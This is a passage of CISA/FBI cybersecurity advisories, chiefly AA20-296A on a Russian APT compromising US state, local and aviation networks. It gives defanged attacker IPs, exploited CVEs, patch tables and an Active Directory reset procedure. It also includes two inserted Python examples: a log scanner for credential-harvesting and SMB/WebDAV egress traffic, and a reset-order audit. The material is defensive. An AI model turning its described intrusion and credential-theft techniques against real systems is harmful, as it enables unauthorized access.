<p>Prioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[<a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">7</a>] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[<a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">8</a>] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.</p>

<h5>Remediate critical web application security risks</h5>

<p>First, identify and remediate critical web application security risks; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[<a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">9</a>],[<a href="https://owasp.org/www-project-top-ten/">10</a>],[<a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">11</a>]</p>

<h5>How do I respond to unauthorized access to election-related systems?</h5>

<h6>Implement your security incident response and business continuity plan</h6>

<p>It may take time for your organization’s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization’s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.</p>

<h6>Contact CISA or law enforcement immediately</h6>

<p>To report an intrusion and to request incident response resources or technical assistance, contact CISA (<a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a> or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI’s Cyber Division (<a href="mailto:CyWatch@ic.fbi.gov">CyWatch@ic.fbi.gov</a> or 855-292-3937).</p>

<h3>Resources</h3>

<ul>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST19-002">CISA Tip: Best Practices for Securing Election Systems</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST16-001">CISA Tip: Securing Voter Registration Data</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-006">CISA Tip: Website Security</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST04-014">CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">CISA Tip: Securing Network Infrastructure Devices</a></li>
<li><a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">CISA Activity Alert: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf">CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities</a></li>
<li>FBI and CISA Public Service Announcement (PSA): <a href="https://ic3.gov/Media/Y2020/PSA201002">Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters</a></li>
<li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA201001">Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections</a></li>
<li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200930">Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href="https://www.ic3.gov/Media/Y2020/PSA200928">False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections</a></li>
<li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200924">Cyber Threats to Voting Processes Could Slow But Not Prevent Voting</a></li>
<li>FBI and CISA PSA: <a href="https://ic3.gov/Media/Y2020/PSA200922">Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results</a></li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href="http://www.fbi.gov/contact-us/field">www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>.</p>

<h3>References</h3>
<ul>
<li><a href="https://support.f5.com/csp/article/K52145254">[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li>
<li><a href="https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness">[2] Progress Telerik details for CVE-2017-9248</a></li>
<li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[3] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies”</a></li>
<li><a href="https://owasp.org/www-project-dependency-check/">[4] OWASP Dependency-Check</a></li>
<li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm">[5] NSA “Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network”</a></li>
<li><a href="https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF">[6] NSA &amp; ASD “CyberSecurity Information: Detect and Prevent Web Shell Malware”</a></li>
<li><a href="https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs">[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs</a></li>
<li><a href="https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf">[8] NSA “NSA’S Top Ten Cybersecurity Mitigation Strategies”</a></li>
<li><a href="https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm">[9] NSA “Building Web Applications – Security for Developers”</a></li>
<li><a href="https://owasp.org/www-project-top-ten/">[10] OWASP Top Ten</a></li>
<li><a href="https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html">[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses</a></li>
</ul>
<h3>Revisions</h3>
<ul>
<li>October 22, 2020: Initial Version</li>
</ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy &amp; Use</a> policy.</p>

</div>


AA20-296A: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets

Original release date: October 22, 2020 | Last revised: November 17, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href=”https://attack.mitre.org/versions/v7/”>ATT&amp;CK for Enterprise</a> framework for all referenced threat actor tactics and techniques.</em></p>

<p>This joint cybersecurity advisory—written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)—provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations</a>.</p>

<p>Since at least September 2020, a Russian state-sponsored APT actor—known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting—has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.</p>

<p>The Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:</p>

<ul>
<li>Sensitive network configurations and passwords.</li>
<li>Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).</li>
<li>IT instructions, such as requesting password resets.</li>
<li>Vendors and purchasing information.</li>
<li>Printing access badges.</li>
</ul>

<p>To date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.</p>

<p>As this recent malicious activity has been directed at SLTT government networks, there may be some risk to elections information housed on SLTT government networks. However, the FBI and CISA have no evidence to date that integrity of elections data has been compromised. Due to the heightened awareness surrounding elections infrastructure and the targeting of SLTT government networks, the FBI and CISA will continue to monitor this activity and its proximity to elections infrastructure.</p>

<ul>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/Joint_CISA_FBI_CSA-AA20-296A__Russian_State_Sponsored_APT_Actor_Compromise_US_Government_Targets.pdf”>PDF</a> version of this report.</li>
<li>Click here for a <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-296A.stix.xml”>STIX</a> package of IOCs.</li>
</ul>

<h4>U.S. Heat Map of Activity</h4>

<p><a href=”https://indd.adobe.com/view/64463245-3411-49f9-b203-1c7cb8f16769″>Click here</a> for an interactive heat map of this activity. Hovering the cursor over the map reveals the number and type of entities the Russian APT has targeted in each region. These totals include compromises, scanning, or other reconnaissance activity executed from the Russian APT actor infrastructure.</p>

<p><strong>Note</strong>: CISA is committed to providing access to our web pages and documents for individuals with disabilities, both members of the public and federal employees. If the format of any elements or content within this document interferes with your ability to access the information, as defined in the Rehabilitation Act, please email <a href=”mailto:info@us-cert.gov”>info@us-cert.gov</a>. To enable us to respond in a manner most helpful to you, please indicate the nature of your accessibility problem and the preferred format in which to receive the material.</p>

<p><strong>Note</strong>: the heat map has interactive features that may not work in your web browser. For best use, please download and save this catalog.</p>
<h3>Technical Details</h3><p>The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses <code>213.74.101[.]65</code>, <code>213.74.139[.]196</code>, and <code>212.252.30[.]170</code> to connect to victim web servers (<em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]).</p>

<p>The actor is using <code>213.74.101[.]65</code> and <code>213.74.139[.]196</code> to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (<em>Brute Force</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1110″>T1110</a>]; <em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]). The APT actor also hosted malicious domains, including possible aviation sector target <code>columbusairports.microsoftonline[.]host</code>, which resolved to <code>108.177.235[.]92</code> and <code>[cityname].westus2.cloudapp.azure.com</code>; these domains are U.S. registered and are likely SLTT government targets (<em>Drive-By Compromise </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1189″>T1189</a>]).</p>

<p>The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a>) and a Microsoft Exchange remote code execution flaw (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a>).</p>

<p>The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE-2019-10149</a>) (<em>External Remote Services</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1133″>T1133</a>]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a>) for Initial Access [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0001/”>TA0001</a>] and a Windows Netlogon vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a>) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>] within the network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]). These vulnerabilities can also be leveraged to compromise other devices on the network (<em>Lateral Movement</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0008/”>TA0008</a>]) and to maintain <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>].</p>

<p>Between early February and mid-September, these APT actors used <code>213.74.101[.]65</code>, <code>212.252.30[.]170</code>, <code>5.196.167[.]184</code>, <code>37.139.7[.]16</code>, <code>149.56.20[.]55</code>, <code>91.227.68[.]97</code>, and <code>5.45.119[.]124</code> to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]).</p>
<h3>Mitigations</h3><h4>Indicators of Compromise</h4>

<p>The APT actor used the following IP addresses and domains to carry out its objectives:</p>


<p>IP address <code>51.159.28[.]101</code> appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address <code>51.159.28[.]101</code> (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).</p>

<p>Organizations should check available logs for traffic to/from IP address <code>51.159.28[.]101</code> for indications of credential-harvesting activity. As the APT actors have likely established, or will establish, additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.</p>
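<p>The log check described above, sketched as an added example (not code from the advisory): it flags records to or from the watchlisted address and any SMB or WebDAV traffic leaving the network to other external addresses. The CSV field names, the RFC 1918 definition of "internal," the WebDAV markers, and the sample records are assumptions constructed for illustration; the SMB ports are the ones the advisory lists for boundary blocking.</p>

```python
import csv
import io
import ipaddress

# SMB and related ports the advisory says to block at the network boundary.
SMB_PORTS = {("tcp", 139), ("tcp", 445), ("udp", 137)}
# WebDAV runs over HTTP(S); these request methods come from RFC 4918.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
# User-Agent prefix sent by the Windows WebClient service (WebDAV redirector).
WEBDAV_AGENT = "microsoft-webdav-miniredir"
# Assumption: the organization's internal address space is RFC 1918 only.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def refang(indicator):
    """Turn a defanged indicator such as 1.2.3[.]4 back into a plain address."""
    return indicator.replace("[.]", ".")


# Indicator quoted in the advisory text, kept defanged in source.
WATCHLIST = {ipaddress.ip_address(refang("51.159.28[.]101"))}


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def classify(row):
    """Return the list of reasons a flow record deserves review (may be empty)."""
    src = ipaddress.ip_address(row["src"])
    dst = ipaddress.ip_address(row["dst"])
    reasons = []
    if src in WATCHLIST or dst in WATCHLIST:
        reasons.append("watchlist-ip")
    # Egress checks apply only to internal clients talking to external hosts.
    if is_internal(src) and not is_internal(dst):
        if (row["proto"].lower(), int(row["dport"])) in SMB_PORTS:
            reasons.append("smb-egress")
        method = (row.get("http_method") or "").upper()
        agent = (row.get("user_agent") or "").lower()
        if method in WEBDAV_METHODS or agent.startswith(WEBDAV_AGENT):
            reasons.append("webdav-egress")
    return reasons


def scan(log_text):
    """Scan CSV flow/proxy records; return (ts, src, dst, reasons) per finding."""
    findings = []
    for row in csv.DictReader(io.StringIO(log_text)):
        try:
            reasons = classify(row)
        except (ValueError, KeyError, AttributeError, TypeError):
            # Unparseable address or port: surface it instead of dropping it.
            reasons = ["malformed-record"]
        if reasons:
            findings.append((row.get("ts"), row.get("src"), row.get("dst"), reasons))
    return findings


# Constructed sample records; external hosts use documentation address ranges.
IOC = str(next(iter(WATCHLIST)))
SAMPLE_LOG = "\n".join([
    "ts,src,dst,proto,dport,http_method,user_agent",
    "2020-10-01T09:00:01Z,10.1.4.22,10.1.0.5,tcp,445,,",
    "2020-10-01T09:00:07Z,10.1.4.22,203.0.113.40,tcp,445,,",
    "2020-10-01T09:01:12Z,10.1.7.9,198.51.100.77,tcp,80,PROPFIND,"
    "Microsoft-WebDAV-MiniRedir/10.0.18363",
    "2020-10-01T09:02:30Z,10.1.7.9,198.51.100.80,tcp,443,GET,Mozilla/5.0",
    f"2020-10-01T09:03:44Z,10.1.9.31,{IOC},tcp,445,,",
    f"2020-10-01T09:04:02Z,{IOC},10.1.9.31,tcp,49822,,",
    "2020-10-01T09:05:00Z,10.1.2.2,not-an-ip,udp,137,,",
])

if __name__ == "__main__":
    for ts, src, dst, reasons in scan(SAMPLE_LOG):
        print(ts, src, "->", dst, ",".join(reasons))
```

<p>Internal-to-internal SMB and ordinary web requests produce no finding, so the output stays focused on traffic that crosses the boundary.</p>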

<p>Refer to <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-296A.stix.xml”>AA20-296A.stix</a> for a downloadable copy of IOCs.</p>

<h4>Network Defense-in-Depth</h4>

<p>Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.</p>

<ul>
<li>Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE-2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to Table 1 for patch information on these CVEs.</li>
</ul>

<p class=”text-align-center”><em>Table 1: Patch information for CVEs</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.467px; height: 312px; margin-left: auto; margin-right: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Vulnerability</strong></th>
<th scope=”col” style=”width: 311px;”><strong>Vulnerable Products</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Patch Information</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Citrix Application Delivery Controller</li>
<li>Citrix Gateway</li>
<li>Citrix SDWAN WANOP</li>
</ul>

</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/”>Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></p>
</td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li>
<li>Microsoft Exchange Server 2013 Cumulative Update 23</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 14</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 15</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 3</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 4</li>
</ul>

</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688″>Microsoft Security Advisory for CVE-2020-0688</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE-2019-10149</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Exim versions 4.87–4.91</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.exim.org/static/doc/security/CVE-2019-10149.txt”>Exim page for CVE-2019-10149</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>FortiOS 6.0: 6.0.0 to 6.0.4</li>
<li>FortiOS 5.6: 5.6.3 to 5.6.7</li>
<li>FortiOS 5.4: 5.4.6 to 5.4.12</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.fortiguard.com/psirt/FG-IR-18-384″>Fortinet Security Advisory: FG-IR-18-384</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>
<li>Windows Server 2012</li>
<li>Windows Server 2012 (Server Core installation)</li>
<li>Windows Server 2012 R2</li>
<li>Windows Server 2016</li>
<li>Windows Server 2019</li>
<li>Windows Server 2019 (Server Core installation)</li>
<li>Windows Server, version 1903 (Server Core installation)</li>
<li>Windows Server, version 1909 (Server Core installation)</li>
<li>Windows Server, version 2004 (Server Core installation)</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>Microsoft Security Advisory for CVE-2020-1472</a></p>

</td>
</tr>
</tbody>
</table>


<ul>
<li>Follow Microsoft’s <a href=”https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc”>guidance</a> on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.</li>
<li>If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>SMB Security Best Practices</a> for more information.</li>
<li>Implement the prevention, detection, and mitigation strategies outlined in:
<ul>
<li>CISA Alert <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A”>TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance</a>.</li>
<li>National Security Agency Cybersecurity Information Sheet <a href=”https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/”>U/OO/134094-20 – Detect and Prevent Web Shells Malware</a>.</li>
</ul>
</li>
<li>Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.</li>
<li>Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.</li>
<li>Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from <code>PROGRAMFILES</code>, <code>PROGRAMFILES(X86)</code>, and <code>WINDOWS</code> folders. All other locations should be disallowed unless an exception is granted.</li>
<li>Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; review exceptions regularly for validity.</li>
</ul>

<h4>Comprehensive Account Resets</h4>

<p>For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized <a href=”https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts”>guidance</a> for this. Such a reset should be performed very carefully if needed.</p>

<p>If there is an observation of <a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise—as well as in Azure-hosted—AD instances.</p>

<p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p>

<p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p>

<ol>
<li>Create a temporary administrator account, and use this account only for all administrative actions</li>
<li>Reset the Kerberos Ticket Granting Ticket (<code>krbtgt</code>) password;[<a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>1</a>] this must be completed before any additional actions (a second reset will take place in step 5)</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li>Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
<ol type=”a”>
<li>User accounts (forced reset with no legacy password reuse)</li>
<li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li>
<li>Service accounts</li>
<li>Directory Services Restore Mode (DSRM) account</li>
<li>Domain Controller machine account</li>
<li>Application passwords</li>
</ol>
</li>
<li>Reset the <code>krbtgt</code> password again</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li>Reboot domain controllers</li>
<li>Reboot all endpoints</li>
</ol>
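<p>One way to audit that the reset sequence above was followed, as an added example (not part of the advisory or Microsoft's guidance): it compares each account's password-last-set time against the two <code>krbtgt</code> resets and lists domain controllers that have not yet received the second reset. The change-record keys, the export layout, and all names and timestamps are hypothetical, constructed for illustration.</p>

```python
from datetime import datetime, timezone

FMT = "%Y-%m-%dT%H:%M:%SZ"


def ts(text):
    """Parse a UTC timestamp in the (assumed) export format."""
    return datetime.strptime(text, FMT).replace(tzinfo=timezone.utc)


def audit(record, dc_krbtgt, accounts):
    """Check exported password timestamps against the reset procedure.

    record    -- change record with the times of step 2, step 3 and step 5
    dc_krbtgt -- krbtgt password-last-set as reported by each domain controller
    accounts  -- {name: (category, password-last-set or "")}
    """
    first = ts(record["krbtgt_reset_1"])
    propagated = ts(record["krbtgt_reset_1_propagated"])
    second = ts(record["krbtgt_reset_2"])
    report = {"sequence_errors": [], "lagging_dcs": [], "accounts": {}}

    # Steps 2, 3 and 5 must have happened in that order.
    if not first <= propagated <= second:
        report["sequence_errors"].append("krbtgt timestamps out of order")

    # Step 6: every domain controller must report the second krbtgt reset.
    report["lagging_dcs"] = sorted(
        dc for dc, seen in dc_krbtgt.items() if ts(seen) < second)

    # Step 4: account resets belong between propagation and the second reset.
    for name, (category, last_set) in accounts.items():
        if not last_set:
            status = "no-timestamp"
        else:
            when = ts(last_set)
            if when < first:
                status = "not-reset"
            elif when < propagated:
                status = "reset-before-propagation"
            elif when > second:
                status = "reset-after-second-krbtgt"
            else:
                continue  # reset inside the expected window
        report["accounts"][name] = (category, status)
    return report


# Constructed change record and exports (all names and times are hypothetical).
RECORD = {
    "krbtgt_reset_1": "2020-10-23T14:00:00Z",
    "krbtgt_reset_1_propagated": "2020-10-23T15:30:00Z",
    "krbtgt_reset_2": "2020-10-24T02:00:00Z",
}
DC_KRBTGT = {
    "DC01": "2020-10-24T02:00:00Z",
    "DC02": "2020-10-24T02:00:00Z",
    "DC03-BRANCH": "2020-10-23T14:00:00Z",
}
ACCOUNTS = {
    "alice": ("user", "2020-10-23T16:10:00Z"),
    "svc-backup": ("service", "2019-03-02T08:00:00Z"),
    "WKSTN-114$": ("computer", "2020-10-23T14:20:00Z"),
    "bob": ("user", "2020-10-24T09:00:00Z"),
    "DC01$": ("dc-machine", "2020-10-23T18:00:00Z"),
    "svc-legacy": ("service", ""),
}

if __name__ == "__main__":
    result = audit(RECORD, DC_KRBTGT, ACCOUNTS)
    print("sequence errors:", result["sequence_errors"])
    print("lagging DCs:", result["lagging_dcs"])
    for account, (category, status) in sorted(result["accounts"].items()):
        print(f"{account:12} {category:10} {status}")
```

<p>Local, DSRM, and application passwords in step 4 are not stored as AD account timestamps, so they need separate tracking outside an export like this one.</p>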

<p>The following accounts should be reset:</p>

<ul>
<li>AD Kerberos Authentication Master (2x)</li>
<li>All Active Directory Accounts</li>
<li>All Active Directory Admin Accounts</li>
<li>All Active Directory Service Accounts</li>
<li>All Active Directory User Accounts</li>
<li>DSRM Account on Domain Controllers</li>
